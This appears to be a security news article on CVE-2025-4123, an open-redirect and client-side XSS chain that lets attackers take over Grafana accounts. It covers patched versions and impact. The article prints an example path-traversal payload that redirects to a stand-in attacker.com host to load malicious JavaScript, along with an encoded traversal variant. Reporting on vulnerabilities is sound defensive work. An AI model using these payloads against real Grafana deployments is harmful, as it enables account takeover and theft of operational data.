A critical vulnerability is affecting over 46,000 publicly accessible Grafana instances worldwide, with 36% of all public-facing deployments vulnerable to complete account takeover.
The newly discovered flaw, designated CVE-2025-4123 and dubbed “The Grafana Ghost,” represents a significant threat to organizations relying on the popular open-source analytics and visualization platform for monitoring critical infrastructure.
Grafana Account Takeover (CVE-2025-4123)
CVE-2025-4123 operates as a sophisticated chain of exploits that begins with a seemingly innocent malicious link sent to victims.
When clicked, the crafted URL forces Grafana to load an external plugin hosted on an attacker's server, enabling arbitrary JavaScript execution within the victim's browser session (a client-side cross-site scripting condition, not code execution on the Grafana server).
The vulnerability specifically targets Grafana’s plugin loading mechanism at the /a/plugin-app/explore endpoint, where attackers can inject malicious JavaScript modules.
The attack leverages a fundamental flaw in Grafana’s static file handling system, specifically within the pkg/api/static/static.go source code.
OX Security researchers reported that the ctx.Req.URL.Path parameter can be manipulated to achieve an open redirect, allowing attackers to redirect users to external malicious sites while maintaining the appearance of legitimate Grafana functionality.
Once the malicious plugin executes, it can modify the victim’s account email address using only the grafana_session token, after which attackers can initiate password reset procedures to complete the account takeover.
Technical analysis reveals that the flaw exploits path normalization weaknesses through a carefully crafted payload: http://localhost:3000/public/../attacker.com/%3f/../…
This string leverages the path.Clean function, where /public/../ resolves to the root directory, while subsequent path traversal sequences enable redirection to attacker-controlled domains.
The payload is structured so that the attacker.com segment ends up where the browser reads a protocol-relative URL (one beginning with //attacker.com), which inherits the current page's scheme and so passes checks that only look for an explicit http:// or https:// prefix.
Modern browsers typically normalize such malicious paths, but Grafana’s client-side JavaScript routing logic provides an alternative attack vector.
By using encoded path traversal sequences like /public/..%2f..%2f..%2f..%2fsomething, attackers can bypass browser normalization and trigger the vulnerability through JavaScript execution.
The technique works because the server-side normalization step and the client-side routing step disagree about what the same path means, and that disagreement is enough to get past both.
The attack is not limited to public-facing instances; internal Grafana deployments are equally exposed.
Because the payload runs in the victim's browser, attackers can craft it to target internal hostnames and ports, so even network-segmented Grafana installations are susceptible to blind attacks as long as an employee's browser can reach both the attacker's link and the internal instance.
Immediate Patching Required
Organizations must immediately upgrade to patched Grafana versions to mitigate this critical vulnerability.
Available security patches include versions 10.4.18+security-01, 11.2.9+security-01, 11.3.6+security-01, 11.4.4+security-01, 11.5.4+security-01, 11.6.1+security-01, and 12.0.0+security-01.
The vulnerability affects a substantial portion of the estimated 128,000 Grafana instances identified through Shodan searches.
A compromised Grafana administrator account provides attackers with complete access to internal metrics, dashboards, sensitive operational data, and business intelligence systems.
Additionally, attackers can lock out legitimate users, delete accounts, and cause significant operational disruption by removing access to critical monitoring infrastructure.
Given Grafana’s widespread adoption in DevOps environments, this vulnerability poses substantial risks to organizational security and operational continuity, making immediate remediation essential for all affected deployments.
